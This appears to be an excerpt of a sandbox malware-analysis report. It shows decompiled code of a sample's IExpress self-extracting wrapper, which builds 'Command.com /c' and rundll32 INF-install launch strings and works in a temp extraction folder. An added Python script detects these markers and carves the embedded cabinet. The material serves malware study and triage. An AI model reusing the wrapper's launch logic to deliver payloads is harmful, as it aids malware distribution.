                                                                                                                                                                                                                                    							_t115 = _t156;
                                                                                                                                                                                                                                    							_t58 = E010B66C8(_t115, _t139);
                                                                                                                                                                                                                                    							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                                                    								_t59 = LocalAlloc(0x40, 0x400); // executed
                                                                                                                                                                                                                                    								_t156 = _t59;
                                                                                                                                                                                                                                    								if(_t156 == 0) {
                                                                                                                                                                                                                                    									goto L43;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                                                    								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                                                    									E010B1680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_push(_t115);
                                                                                                                                                                                                                                    									_t108 = 0x400;
                                                                                                                                                                                                                                    									E010B1781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                                                    									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                                                    										E010B16B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                                                    										E010B16B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t140 = _t156;
                                                                                                                                                                                                                                    								 *_t156 = 0;
                                                                                                                                                                                                                                    								E010B2AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                                                    								goto L53;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t108 = "Command.com /c %s";
                                                                                                                                                                                                                                    								_t125 = "Command.com /c %s";
                                                                                                                                                                                                                                    								_t145 = _t125 + 1;
                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                    									_t76 =  *_t125;
                                                                                                                                                                                                                                    									_t125 = _t125 + 1;
                                                                                                                                                                                                                                    								} while (_t76 != 0);
                                                                                                                                                                                                                                    								_t126 = _t125 - _t145;
                                                                                                                                                                                                                                    								_t146 =  &_v268;
                                                                                                                                                                                                                                    								_t157 = _t146 + 1;
                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                    									_t77 =  *_t146;
                                                                                                                                                                                                                                    									_t146 = _t146 + 1;
                                                                                                                                                                                                                                    								} while (_t77 != 0);
                                                                                                                                                                                                                                    								_t140 = _t146 - _t157;
                                                                                                                                                                                                                                    								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                                                    								if(_t156 != 0) {
                                                                                                                                                                                                                                    									E010B171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                                                    									goto L53;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L43;
                                                                                                                                                                                                                                    							}
			} else {
				_t85 = GetFileAttributesA( &_v268);
				if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
					_t140 = 0x525;
					_push(0);
					_push(0x10);
					_push(0);
					_t60 =  &_v268;
					goto L35;
				} else {
					_t140 = "[";
					_v1556 = _t151;
					_t90 = E010B1A84( &_v1556, "[");
					if(_t90 != 0) {
						if( *_t90 != 0) {
							_v1556 = _t90;
						}
						_t140 = "]";
						E010B1A84( &_v1556, "]");
					}
					_t156 = LocalAlloc(0x40, 0x200);
					if(_t156 == 0) {
						L43:
						_t60 = 0;
						_t140 = 0x4b5;
						_push(0);
						_push(0x10);
						_push(0);
						L35:
						_push(_t60);
						E010B44B9(0, _t140);
						_t62 = 0;
						goto L54;
					} else {
						_t155 = _v1556;
						_t92 = _t155;
						if( *_t155 == 0) {
							_t92 = "DefaultInstall";
						}
						 *0x10b9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
						 *_v1560 = 1;
						if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x10b1140, _t156, 8,  &_v268) == 0) {
							 *0x10b9a34 =  *0x10b9a34 & 0xfffffffb;
							if( *0x10b9a40 != 0) {
								_t108 = "setupapi.dll";
							} else {
								_t108 = "setupx.dll";
								GetShortPathNameA( &_v268,  &_v268, 0x104);
							}
							if( *_t155 == 0) {
								_t155 = "DefaultInstall";
							}
							_push( &_v268);
							_push(_t155);
							E010B171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
						} else {
							 *0x10b9a34 =  *0x10b9a34 | 0x00000004;
							if( *_t155 == 0) {
								_t155 = "DefaultInstall";
							}
							E010B1680(_t108, 0x104, _t155);
							_t140 = 0x200;
							E010B1680(_t156, 0x200,  &_v268);
						}
						L53:
						_t62 = 1;
						 *_v1564 = _t156;
						L54:
						_pop(_t152);
						return E010B6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
					}
				}
			}
		}
	}
}

Instruction address column belonging to the decompiled lines above (the per-line addresses were separated from the listing during extraction):
0x010b1af3 0x010b1afa 0x010b1b07 0x010b1b09 0x010b1b1a 0x010b1b20 0x010b1b2c 0x010b1b3b 0x010b1b40 0x010b1b2e 0x010b1b2e 0x010b1b33 0x010b1b33 0x010b1b46 0x010b1b4c 0x010b1b52 0x010b1b57 0x010b1b5d 0x010b1b61 0x010b1b9f 0x010b1b9f 0x010b1bb1 0x010b1bc2 0x00000000 0x010b1b63 0x010b1b63 0x010b1b65 0x010b1b68 0x010b1b68 0x010b1b6a 0x010b1b6b 0x010b1b6f 0x010b1b74 0x00000000 0x00000000 0x010b1b76 0x010b1b7b 0x010b1b86 0x00000000 0x00000000 0x00000000 0x00000000 0x010b1b8c 0x010b1b8c 0x010b1b98 0x010b1bc7 0x010b1bc9 0x010b1bcc 0x010b1bd3 0x010b1d75 0x010b1d76 0x010b1d78 0x010b1d7f 0x010b1dff 0x010b1e05 0x010b1e09 0x00000000 0x00000000 0x010b1e12 0x010b1e1b 0x010b1e73 0x010b1e21 0x010b1e21 0x010b1e28 0x010b1e37 0x010b1e3e 0x010b1e52 0x010b1e60 0x010b1e60 0x010b1e3e 0x010b1e79
                                                                                                                                                                                                                                    0x010b1e7b
                                                                                                                                                                                                                                    0x010b1e84
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1d9b
                                                                                                                                                                                                                                    0x010b1d9b
                                                                                                                                                                                                                                    0x010b1da0
                                                                                                                                                                                                                                    0x010b1da2
                                                                                                                                                                                                                                    0x010b1da5
                                                                                                                                                                                                                                    0x010b1da5
                                                                                                                                                                                                                                    0x010b1da7
                                                                                                                                                                                                                                    0x010b1da8
                                                                                                                                                                                                                                    0x010b1dac
                                                                                                                                                                                                                                    0x010b1dae
                                                                                                                                                                                                                                    0x010b1db4
                                                                                                                                                                                                                                    0x010b1db7
                                                                                                                                                                                                                                    0x010b1db7
                                                                                                                                                                                                                                    0x010b1db9
                                                                                                                                                                                                                                    0x010b1dba
                                                                                                                                                                                                                                    0x010b1dbe
                                                                                                                                                                                                                                    0x010b1dc3
                                                                                                                                                                                                                                    0x010b1dce
                                                                                                                                                                                                                                    0x010b1dd2
                                                                                                                                                                                                                                    0x010b1deb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1df0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1dd2
                                                                                                                                                                                                                                    0x010b1bf7
                                                                                                                                                                                                                                    0x010b1bfe
                                                                                                                                                                                                                                    0x010b1c07
                                                                                                                                                                                                                                    0x010b1d55
                                                                                                                                                                                                                                    0x010b1d5a
                                                                                                                                                                                                                                    0x010b1d5b
                                                                                                                                                                                                                                    0x010b1d5d
                                                                                                                                                                                                                                    0x010b1d5e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1c1b
                                                                                                                                                                                                                                    0x010b1c1b
                                                                                                                                                                                                                                    0x010b1c20
                                                                                                                                                                                                                                    0x010b1c2c
                                                                                                                                                                                                                                    0x010b1c33
                                                                                                                                                                                                                                    0x010b1c38
                                                                                                                                                                                                                                    0x010b1c3a
                                                                                                                                                                                                                                    0x010b1c3a
                                                                                                                                                                                                                                    0x010b1c40
                                                                                                                                                                                                                                    0x010b1c4b
                                                                                                                                                                                                                                    0x010b1c4b
                                                                                                                                                                                                                                    0x010b1c5d
                                                                                                                                                                                                                                    0x010b1c61
                                                                                                                                                                                                                                    0x010b1dd4
                                                                                                                                                                                                                                    0x010b1dd4
                                                                                                                                                                                                                                    0x010b1dd6
                                                                                                                                                                                                                                    0x010b1ddb
                                                                                                                                                                                                                                    0x010b1ddc
                                                                                                                                                                                                                                    0x010b1dde
                                                                                                                                                                                                                                    0x010b1d64
                                                                                                                                                                                                                                    0x010b1d64
                                                                                                                                                                                                                                    0x010b1d67
                                                                                                                                                                                                                                    0x010b1d6c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1c67
                                                                                                                                                                                                                                    0x010b1c67
                                                                                                                                                                                                                                    0x010b1c6d
                                                                                                                                                                                                                                    0x010b1c72
                                                                                                                                                                                                                                    0x010b1c74
                                                                                                                                                                                                                                    0x010b1c74
                                                                                                                                                                                                                                    0x010b1c8e
                                                                                                                                                                                                                                    0x010b1c99
                                                                                                                                                                                                                                    0x010b1cc0
                                                                                                                                                                                                                                    0x010b1cf8
                                                                                                                                                                                                                                    0x010b1d07
                                                                                                                                                                                                                                    0x010b1d23
                                                                                                                                                                                                                                    0x010b1d09
                                                                                                                                                                                                                                    0x010b1d14
                                                                                                                                                                                                                                    0x010b1d1b
                                                                                                                                                                                                                                    0x010b1d1b
                                                                                                                                                                                                                                    0x010b1d2b
                                                                                                                                                                                                                                    0x010b1d2d
                                                                                                                                                                                                                                    0x010b1d2d
                                                                                                                                                                                                                                    0x010b1d38
                                                                                                                                                                                                                                    0x010b1d39
                                                                                                                                                                                                                                    0x010b1d46
                                                                                                                                                                                                                                    0x010b1cc2
                                                                                                                                                                                                                                    0x010b1cc2
                                                                                                                                                                                                                                    0x010b1ccc
                                                                                                                                                                                                                                    0x010b1cce
                                                                                                                                                                                                                                    0x010b1cce
                                                                                                                                                                                                                                    0x010b1cdb
                                                                                                                                                                                                                                    0x010b1ce6
                                                                                                                                                                                                                                    0x010b1cee
                                                                                                                                                                                                                                    0x010b1cee
                                                                                                                                                                                                                                    0x010b1e89
                                                                                                                                                                                                                                    0x010b1e91
                                                                                                                                                                                                                                    0x010b1e92
                                                                                                                                                                                                                                    0x010b1e94
                                                                                                                                                                                                                                    0x010b1e97
                                                                                                                                                                                                                                    0x010b1ea4
                                                                                                                                                                                                                                    0x010b1ea4
                                                                                                                                                                                                                                    0x010b1c61
                                                                                                                                                                                                                                    0x010b1c07
                                                                                                                                                                                                                                    0x010b1bd3
                                                                                                                                                                                                                                    0x010b1b7b

APIs
• CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 010B1BE7
• GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 010B1BFE
• LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 010B1C57
• GetPrivateProfileIntA.KERNEL32 ref: 010B1C88
• GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,010B1140,00000000,00000008,?), ref: 010B1CB8
• GetShortPathNameA.KERNEL32 ref: 010B1D1B
  • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
  • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
• String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
• API String ID: 383838535-2145762761
• Opcode ID: 461e35994a94ce858a5dc4ac6a0cfba0b258becc0f26de5931e5f34fef0e732f
• Instruction ID: 13bfc113a88a84ae7b12aa35f8072cfb78938a565ec28101a33b9d87d211b4be
• Opcode Fuzzy Hash: 461e35994a94ce858a5dc4ac6a0cfba0b258becc0f26de5931e5f34fef0e732f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BA19F70A002086BEB70AB28ECE4FEA77ADEB55310F1046D5E5D5A32C0DB759E85CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph

(Rendered interactively in the original report, with executed and non-executed basic blocks colour-coded.) The graph covers basic blocks 10b2f1d through 10b30b7. The blocks that reach the Windows API are 10b2f86-10b2fbe (GetSystemDirectoryA, LoadLibraryA), 10b2fc0-10b2fd4 (GetProcAddress), 10b2fd6-10b2fee (DecryptFileA), 10b2ff7-10b3004 (FreeLibrary) and 10b3017-10b3024 (SetCurrentDirectoryA). Internal calls go to 10b5164, 10b51e5, 10b3a3f, 10b55a0, 10b658a, 10b6ce0, 10b621e, 10b44b9, 10b6285, 10b3b26, 10b256d, 10b3ba2 and 10b4169.
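The strings under String ID (Command.com /c %s, rundll32.exe %s,InstallHinfSection %s 128 %s, AdvancedINF, DefaultInstall, the IXP001.TMP temp directory) together with the runtime-resolved DecryptFileA call in the function below match Microsoft's IExpress/wextract self-extracting stub, which this sample uses as an outer wrapper around the real payload. The triage script that follows is an added example, not Joe Sandbox output and not code from the sample: it flags those marker strings in a file and carves the appended MS-CAB (MSCF) blob by validating the 36-byte CFHEADER rather than trusting the first "MSCF" it sees. The input it scans is constructed in the script; the marker set and the IXP\d{3}.TMP pattern are my assumptions drawn from the strings on this page.

```python
"""Added triage example: spot wextract/IExpress SFX markers and carve the
appended cabinet.  Not Joe Sandbox code and not code from the sample."""
import re
import struct

# Marker strings of the wextract stub.  The literal ones are taken from the
# report's String ID list; the IXP regex matches the runtime temp-directory
# name shown there (assumption: the stub always names it IXP<nnn>.TMP).
WEXTRACT_MARKERS = {
    "inf_install": rb"rundll32\.exe %s,InstallHinfSection %s 128 %s",
    "command_com": rb"Command\.com /c %s",
    "advanced_inf": rb"AdvancedINF",
    "default_install": rb"DefaultInstall",
    "ixp_tempdir": rb"IXP\d{3}\.TMP",
    "decrypt_file": rb"DecryptFileA",
}

# CFHEADER: signature, reserved1, cbCabinet, reserved2, coffFiles, reserved3,
# versionMinor, versionMajor, cFolders, cFiles, flags, setID, iCabinet (36 bytes)
CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")


def find_wextract_markers(data: bytes) -> dict:
    """Return {marker_name: offset} for every stub marker present in data."""
    hits = {}
    for name, pattern in WEXTRACT_MARKERS.items():
        m = re.search(pattern, data)
        if m:
            hits[name] = m.start()
    return hits


def carve_cabinets(data: bytes) -> list:
    """Locate plausible MSCF cabinets and return their offset, size and bytes.

    Every 'MSCF' occurrence is checked against the header layout (zero
    reserved words, format version 1.3, file-table offset inside the cabinet,
    declared size fitting in the buffer) so decoy strings are skipped.
    """
    found = []
    pos = 0
    while True:
        pos = data.find(b"MSCF", pos)
        if pos < 0 or pos + CFHEADER.size > len(data):
            break
        (_sig, res1, cb, res2, coff_files, res3, vmin, vmaj,
         nfolders, nfiles, _flags, _setid, _icab) = CFHEADER.unpack_from(data, pos)
        plausible = (res1 == 0 and res2 == 0 and res3 == 0
                     and (vmaj, vmin) == (1, 3)
                     and CFHEADER.size < coff_files <= cb
                     and nfolders >= 1 and nfiles >= 1
                     and pos + cb <= len(data))
        if plausible:
            found.append({"offset": pos, "size": cb, "data": data[pos:pos + cb]})
            pos += cb
        else:
            pos += 4
    return found


def build_fake_cab(payload: bytes) -> bytes:
    """Constructed test input: a CFHEADER (one folder, one file), an 8-byte
    CFFOLDER placeholder, then the payload bytes.  Only the header is real."""
    folder = struct.pack("<IHH", 0, 0, 0)
    size = CFHEADER.size + len(folder) + len(payload)
    header = CFHEADER.pack(b"MSCF", 0, size, 0, CFHEADER.size + len(folder), 0,
                           3, 1, 1, 1, 0, 0x1234, 0)
    return header + folder + payload


def build_sample_stub() -> bytes:
    """Constructed stand-in for a wextract dropper: stub strings, a decoy
    'MSCF' with non-zero reserved bytes, then the appended cabinet."""
    strings = b"\0".join([
        b"rundll32.exe %s,InstallHinfSection %s 128 %s",
        b"Command.com /c %s", b"AdvancedINF", b"DefaultInstall",
        b"DecryptFileA", b"advapi32.dll",
        b"C:\\Users\\user\\AppData\\Local\\Temp\\IXP001.TMP\\",
    ])
    decoy = b"MSCF" + b"junk" * 8      # header-sized, but reserved1 != 0
    return (b"MZ" + b"\0" * 64 + strings + b"\0" * 16 + decoy
            + b"\0" * 16 + build_fake_cab(b"payload" * 10))


if __name__ == "__main__":
    blob = build_sample_stub()
    print("markers:", find_wextract_markers(blob))
    for cab in carve_cabinets(blob):
        print("cabinet at 0x%x, %d bytes" % (cab["offset"], cab["size"]))
```

On a real file, the carved bytes can be handed straight to cabextract or 7z; nested IXP stubs (IXP000, IXP001, ...) mean the carved cabinet will often contain another wextract executable, so run the same scan over each extracted member.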
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E010B2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v272;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                    				struct HWND__* _t12;
                                                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                                                    				int _t47;
                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t43 = __edx;
				_t9 =  *0x10b8004; // 0x72151d89, the /GS security cookie
				_v8 = _t9 ^ _t46; // cookie XOR frame pointer: stack canary, re-checked on every return path (the epilog call passes _v8 ^ _t46)
                                                                                                                                                                                                                                    				if( *0x10b8a38 != 0) {
                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                    					_t11 = E010B5164(_t52);
                                                                                                                                                                                                                                    					_t53 = _t11;
                                                                                                                                                                                                                                    					if(_t11 == 0) {
                                                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                                                    						_t12 = 0;
                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                    						return E010B6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t14 = E010B55A0(_t53); // executed
                                                                                                                                                                                                                                    					if(_t14 == 0) {
                                                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105); // 0x105 = MAX_PATH + 1
						_t43 = 0x105;
						_t40 =  &_v272;
						E010B658A( &_v272, 0x105, "advapi32.dll"); // appends "advapi32.dll" to the system directory path
						_t36 = LoadLibraryA( &_v272); // loaded by full path, so not exposed to DLL search-order hijacking
                                                                                                                                                                                                                                    						_t44 = 0;
                                                                                                                                                                                                                                    						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA"); // resolved at runtime rather than through the import table
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x10ba288("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\", 0); // executed
								_v276(); // the decompiler has split one call in two: this is DecryptFileA(<IXP001.TMP dir>, 0), which clears any EFS encryption on the extraction folder
								if(_t47 != _t47) { // ESP sanity check after the indirect call
									_t40 = 4; // FAST_FAIL_INCORRECT_STACK
									asm("int 0x29"); // __fastfail: process is terminated immediately, no SEH
								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
						FreeLibrary(_t36);
						_t58 =  *0x10b8a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\"); // executed; the extraction folder becomes the working directory for whatever the stub launches next
                                                                                                                                                                                                                                    							if(_t21 != 0) {
                                                                                                                                                                                                                                    								__eflags =  *0x10b8a2c - _t44; // 0x0
                                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                                    									L20:
                                                                                                                                                                                                                                    									__eflags =  *0x10b8d48 & 0x000000c0;
                                                                                                                                                                                                                                    									if(( *0x10b8d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                    										_t41 =  *0x10b9a40; // 0x3, executed
                                                                                                                                                                                                                                    										_t26 = E010B256D(_t41); // executed
                                                                                                                                                                                                                                    										_t44 = _t26;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t22 =  *0x10b8a24; // 0x0
                                                                                                                                                                                                                                    									 *0x10b9a44 = _t44;
                                                                                                                                                                                                                                    									__eflags = _t22;
                                                                                                                                                                                                                                    									if(_t22 != 0) {
                                                                                                                                                                                                                                    										L26:
                                                                                                                                                                                                                                    										__eflags =  *0x10b8a38;
                                                                                                                                                                                                                                    										if( *0x10b8a38 == 0) {
                                                                                                                                                                                                                                    											__eflags = _t22;
                                                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                                                    												E010B4169(__eflags);
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t12 = 1;
                                                                                                                                                                                                                                    										goto L17;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										__eflags =  *0x10b9a30 - _t22; // 0x0
                                                                                                                                                                                                                                    										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E010B3BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x10b8a24; // 0x0
										goto L26;
									}
								}
								_t27 = E010B3B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E010B44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x10b9124 = E010B6285();
							goto L16;
						}
						_t59 =  *0x10b9a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E010B621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x10b8a24;
				if( *0x10b8a24 != 0) {
					L4:
					_t34 = E010B3A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E010B51E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x10b8a38;
				if( *0x10b8a38 != 0) {
					goto L5;
				}
				goto L4;
			}
                                                                                                                                                                                                                                    0x010b2f1d
                                                                                                                                                                                                                                    0x010b2f28
                                                                                                                                                                                                                                    0x010b2f2f
                                                                                                                                                                                                                                    0x010b2f3d
                                                                                                                                                                                                                                    0x010b2f6c
                                                                                                                                                                                                                                    0x010b2f6c
                                                                                                                                                                                                                                    0x010b2f71
                                                                                                                                                                                                                                    0x010b2f73
                                                                                                                                                                                                                                    0x010b3041
                                                                                                                                                                                                                                    0x010b3041
                                                                                                                                                                                                                                    0x010b3043
                                                                                                                                                                                                                                    0x010b3053
                                                                                                                                                                                                                                    0x010b3053
                                                                                                                                                                                                                                    0x010b2f79
                                                                                                                                                                                                                                    0x010b2f80
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2f86
                                                                                                                                                                                                                                    0x010b2f86
                                                                                                                                                                                                                                    0x010b2f93
                                                                                                                                                                                                                                    0x010b2f9e
                                                                                                                                                                                                                                    0x010b2fa0
                                                                                                                                                                                                                                    0x010b2fa6
                                                                                                                                                                                                                                    0x010b2fb8
                                                                                                                                                                                                                                    0x010b2fba
                                                                                                                                                                                                                                    0x010b2fbe
                                                                                                                                                                                                                                    0x010b2fc6
                                                                                                                                                                                                                                    0x010b2fcc
                                                                                                                                                                                                                                    0x010b2fd4
                                                                                                                                                                                                                                    0x010b2fd6
                                                                                                                                                                                                                                    0x010b2fd8
                                                                                                                                                                                                                                    0x010b2fe0
                                                                                                                                                                                                                                    0x010b2fe6
                                                                                                                                                                                                                                    0x010b2fee
                                                                                                                                                                                                                                    0x010b2ff0
                                                                                                                                                                                                                                    0x010b2ff5
                                                                                                                                                                                                                                    0x010b2ff5
                                                                                                                                                                                                                                    0x010b2fee
                                                                                                                                                                                                                                    0x010b2fd4
                                                                                                                                                                                                                                    0x010b2ff8
                                                                                                                                                                                                                                    0x010b2ffe
                                                                                                                                                                                                                                    0x010b3004
                                                                                                                                                                                                                                    0x010b3017
                                                                                                                                                                                                                                    0x010b301c
                                                                                                                                                                                                                                    0x010b3024
                                                                                                                                                                                                                                    0x010b3054
                                                                                                                                                                                                                                    0x010b305a
                                                                                                                                                                                                                                    0x010b3065
                                                                                                                                                                                                                                    0x010b3065
                                                                                                                                                                                                                                    0x010b306c
                                                                                                                                                                                                                                    0x010b306e
                                                                                                                                                                                                                                    0x010b3075
                                                                                                                                                                                                                                    0x010b307a
                                                                                                                                                                                                                                    0x010b307a
                                                                                                                                                                                                                                    0x010b307c
                                                                                                                                                                                                                                    0x010b3081
                                                                                                                                                                                                                                    0x010b3087
                                                                                                                                                                                                                                    0x010b3089
                                                                                                                                                                                                                                    0x010b30a1
                                                                                                                                                                                                                                    0x010b30a1
                                                                                                                                                                                                                                    0x010b30a9
                                                                                                                                                                                                                                    0x010b30ab
                                                                                                                                                                                                                                    0x010b30ad
                                                                                                                                                                                                                                    0x010b30af
                                                                                                                                                                                                                                    0x010b30af
                                                                                                                                                                                                                                    0x010b30ad
                                                                                                                                                                                                                                    0x010b30b6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b308b
                                                                                                                                                                                                                                    0x010b308b
                                                                                                                                                                                                                                    0x010b3091
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3093
                                                                                                                                                                                                                                    0x010b3098
                                                                                                                                                                                                                                    0x010b309a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b309c
                                                                                                                                                                                                                                    0x00000000

APIs
• GetSystemDirectoryA.KERNEL32 ref: 010B2F93
• LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 010B2FB2
• GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 010B2FC6
• DecryptFileA.ADVAPI32 ref: 010B2FE6
• FreeLibrary.KERNEL32(00000000), ref: 010B2FF8
• SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010B301C
  • Part of subcall function 010B51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010B2F4D,?,00000002,00000000), ref: 010B5201
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
• String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
• API String ID: 2126469477-4070797333
• Opcode ID: cf54fb3157ad6294e6cbc5c57edf292dab78ffac3014fc8b8b490037aeb2712b
• Instruction ID: f2af1d80f3aa66d30a1eeb85cc5fc16dfb9ad1bdf075f118167de6ebd417d022
• Opcode Fuzzy Hash: cf54fb3157ad6294e6cbc5c57edf292dab78ffac3014fc8b8b490037aeb2712b
